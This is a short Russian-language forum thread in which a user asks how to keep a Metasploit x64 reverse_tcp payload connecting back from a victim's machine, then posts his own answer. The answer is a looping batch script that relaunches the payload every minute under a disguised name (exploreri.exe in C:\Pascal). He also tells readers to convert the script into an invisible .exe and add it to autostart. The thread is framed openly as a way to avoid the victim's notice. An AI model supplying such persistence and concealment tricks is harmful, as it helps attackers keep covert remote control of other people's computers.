reverse_tcp exploit

Discussion in 'Песочница' started by quadcopter, 4 Dec 2016.

  1. quadcopter

    quadcopter Banned

    Joined:
    30 Nov 2016
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Возник вопрос по Metasploit, если сначала жертва запустит созданный мною эксплойт, а потом я со своей машины попробую подключиться к жертве, то ничего не выйдет. Сначала нужно запускать команду exploit а уже потом жертва должна запустить .exe файл. Была идея написать батник который бы запускал ехе каждую минуту, но ведь это слишком палевно. У кого какие идеи? Использую х64 reverse_tcp.
     
  2. quadcopter

    quadcopter Banned

    Joined:
    30 Nov 2016
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Все, решил все через маленький скрипт
    @Echo off
    :begin
    start C:\Pascal\exploreri.exe
    ping -n 1 -w 30000 192.168.254.254>NUL
    taskkill /f /im C:\Pascal\exploreri.exe
    ping -n 1 -w 30000 192.168.254.254>NUL
    goto :begin
    После того, как сохранил сие чудо в .bat, я переконвертировал его в .exe с помощью BatToExeConverter. В конвертере надо поставить галку невидимое приложение, и окно cmd не будет открываться. Путь Pascal\exploreri.exe выбрал чтобы было беспалевно, exploreri.exe это сам файл эксплойта. Не забудьте закинуть переконвертированое чудо в автозагрузку. Эксплойт запускается каждую минуту.
     
    #2 quadcopter, 4 Dec 2016
    Last edited: 4 Dec 2016